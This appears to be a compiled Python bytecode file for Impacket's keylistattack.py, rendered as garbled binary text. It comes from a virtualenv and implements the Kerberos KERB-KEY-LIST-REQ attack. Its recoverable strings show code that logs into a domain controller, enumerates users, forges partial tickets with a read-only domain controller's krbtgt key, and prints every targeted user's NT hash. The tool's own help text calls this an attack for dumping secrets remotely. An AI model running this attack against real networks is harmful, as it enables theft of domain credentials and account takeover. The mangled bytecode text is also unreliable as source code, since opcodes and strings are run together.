o
    jX0                  
   @   s  d dl Z d dlZd dlZd dlmZ d dlmZmZ d dlm	Z	 d dl
mZ d dlmZ d dlmZ d dlmZ ze ZW n eyI   eZY nw G d	d
 d
Zedkrd dlZd dlZzd dlZd dlmZmZmZ W n ey   ed e d Y nw eej! ej"dddZ#e#j$dddd e#j$dde%dd e#j$dddd e#j$ddddd e#j$d dd!d e#j$d"dd#d e#&d$Z'e'j$d%dd&d e'j$d'dd(d e'j$d)dd*d e'j$d+dd,d e#&d-Z'e'j$d.dd/d0d1 e'j$d2dd3d e'j$d4dd5d e'j$d6dd7d8d1 e#&d9Z'e'j$d:dd;d<d1 e'j$d=dd;d>d1 e(ej)dkr3e#*  e d e#+ Z,e-e,j.e,j/ e,j0du rOe 1d? e d e,j2du r_e 1d@ e d e	e,j3\Z4Z5Z6Z7e7dAkrwe 1dB e d e7dCkrcg Z8e,j9du re :dD e,j;dure8<e,j; n}e,j=dur	z8e>e,j=dE'Z?e?D ]Z@e@A Z3e3dAkre3d  dFkre8<e3dG dH  qW d   n	1 sw   Y  W n" eBy Z1 ze 1dIe,j=eCe1 e d W Y dZ1[1ndZ1[1ww e(e8d kre 1dJ e d n
e 1dK e d e,jDdur-dLe,jDv r)e,jDEdLd\Z7Z4ne,jDZ7n
e 1dM e d e,jFdu r@e7e,_Fe,j4durIe,j4Z4e4dAkrXe 1dN e d ee7e5e6e4e,de8ZGncdOe,j3vrse 1dP e d e,jFdu r|e7e,_Fe4dAkre 1dQ e d e5dAkre 1dR e d e6dAkre,jHdu re,jIdu re,jJdu rd dSlKmKZK eKdTZ6ee7e5e6e4e,dg dUZGzeGL  W dS  eMy ZN ze O jPe jQkrd dlRZReRS  e 1eN W Y dZN[NdS dZN[Nww dS )V    N)logger)RemoteOperationsKeyListSecrets)parse_target)	constants)	Principal)SMBConnection)versionc                   @   s,   e Zd Zdd Zdd Zdd Zdd Zd	S )
KeyListDumpc                 C   s   || _ || _|| _|j| _|j| _|j| _|| _	|j
| _|j| _|j| _|| _|| _|j| _d | _d | _d | _|jd urH|jd\| _| _d S d| _d| _d S )N: )_KeyListDump__domain_KeyListDump__username_KeyListDump__passwordaesKey_KeyListDump__aesKeyk_KeyListDump__doKerberosrodcKey_KeyListDump__aesKeyRodc_KeyListDump__remoteName	target_ip_KeyListDump__remoteHostdc_ip_KeyListDump__kdcHostrodcNo_KeyListDump__rodc_KeyListDump__enum_KeyListDump__targetsfull_KeyListDump__full_KeyListDump__smbConnection_KeyListDump__remoteOps_KeyListDump__keyListSecretshashessplit_KeyListDump__lmhash_KeyListDump__nthash)self
remoteNameusernamepassworddomainoptionsenumtargets r0   /root/aizidognhua/tmp/workspace/projects/ec89d86c-575f-41c9-af57-ac45cbdbf775/venv/lib/python3.10/site-packages/../../../bin/keylistattack.py__init__2   s(   

zKeyListDump.__init__c              
   C   s   z3t | j| j| _| jr"| j| j| j| j| j	| j
| j| j W d S | j| j| j| j| j	| j
 W d S  ty] } ztdd urQ| jdu rQtdt|  n W Y d }~d S d }~ww )N
KRB5CCNAMETz9SMBConnection didn't work, hoping Kerberos will help (%s))r   r   r   r!   r   kerberosLoginr   r   r   r&   r'   r   r   login	Exceptionosgetenvloggingdebugstr)r(   er0   r0   r1   connectK   s"   

zKeyListDump.connectc           	      C   sB  | j du r=|   t| j| j| j| _| j| j t	| j| j
| j| j| j| _td | jdu r7|  }n| j }ntd t	| j| j
| j| jd | _| j}td td |D ]@}|dd }td| tjjjd	}| j|\}}| j|||}|d ur| j||}t| jd
 | d |dd    q^d S )NTz@Enumerating target users. This may take a while on large domainsz(Using target users provided by parameterz4Dumping Domain Credentials (domain\uid:[rid]:nthash)z;Using the KERB-KEY-LIST request method. Tickets everywhere!r   r   z%s)type\   )r   r=   r   r!   r   r   r"   connectSamrr   r   r   r   r   r#   r9   infor    getAllDomainUsersgetAllowedUsersToReplicater   r%   r   r   PrincipalNameTypeNT_PRINCIPALvaluecreatePartialTGT
getFullTGTgetKeyprint)	r(   
targetList
targetUserusertargetUserName
partialTGT
sessionKeyfullTGTkeyr0   r0   r1   run^   s0   






"zKeyListDump.runc                 C   sb   | j  }g d}g }|d d D ]}|d |vr.d|d vr.||d d t|d   q|S )N)i  i  i  i  Buffer
RelativeIdkrbtgt_Namer   )r"   getDomainUsersappendr;   )r(   respdeniedUsersrL   rN   r0   r0   r1   rC   y   s   
zKeyListDump.getAllDomainUsersN)__name__
__module____qualname__r2   r=   rT   rC   r0   r0   r0   r1   r
   1   s
    r
   __main__)noValue
SequenceOfIntegerz"This module needs pyasn1 installed   TzpPerforms the KERB-KEY-LIST-REQ attack to dump secrets from the remote machine without executing any agent there.)add_helpdescriptiontargetstorez[[domain/]username[:password]@]<KDC HostName or IP address> (Use this credential to authenticate to SMB and list domain users (low-privilege account) or LIST (if you want to parse a target file) )actionhelpz-rodcNoz!Number of the RODC krbtgt account)ri   r>   rj   z-rodcKeyz*AES key of the Read Only Domain Controllerz-full
store_trueFzaRun the attack against all domain users. Noisy! It could lead to more TGS requests being rejected)ri   defaultrj   z-debugzTurn DEBUG output ONz-tsz&Adds timestamp to every logging outputzLIST optionz-domainz6The fully qualified domain name (only works with LIST)z-kdcz+KDC HostName or FQDN (only works with LIST)z-tz9Attack only the username specified (only works with LIST)z-tfzDFile that contains a list of target usernames (only works with LIST)authenticationz-hasheszLMHASH:NTHASHz=Use NTLM hashes to authenticate to SMB and list domain users.)ri   metavarrj   z-no-passz&don't ask for password (useful for -k)z-kzUse Kerberos to authenticate to SMB and list domain users. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command linez-aesKeyzhex keyz<AES key to use for Kerberos Authentication (128 or 256 bits)
connectionz-dc-ipz
ip addresszoIP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameterz
-target-ipzIP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve itz/You must specify the RODC number (krbtgt_XXXXX)z!You must specify the RODC aes keyr   z0You must specify a target or set the option LISTLISTzFlag -full will have no effectr#r   zN/AzCould not open file: %s - %szNo valid targets specified!z2You must specify a target username or targets file.z)You must specify the KDC HostName or FQDNzTYou must specify a target domain. Use the flag -domain or define a FQDN in flag -kdc@z/You must specify the KDC HostName or IP Addressz You must specify a target domainzYou must specify a username)getpassz	Password:)r/   )Tr9   r7   randomimpacket.examplesr   impacket.examples.secretsdumpr   r   impacket.examples.utilsr   impacket.krb5r   impacket.krb5.typesr   impacket.smbconnectionr   impacketr	   SystemRandomrandNotImplementedErrorr
   r]   argparsesyspyasn1pyasn1.type.univra   rb   rc   ImportErrorrK   exitBANNERArgumentParserparseradd_argumentintadd_argument_groupgrouplenargv
print_help
parse_argsr-   inittsr:   r   errorr   rg   r,   r*   r+   r)   r/   r   warningtrZ   tfopenflinestripIOErrorr;   kdcr%   r   keylistdumperr$   no_passr   ru   rT   r6   r<   	getLoggerlevelDEBUG	traceback	print_excr0   r0   r0   r1   <module>   s
  
T































. 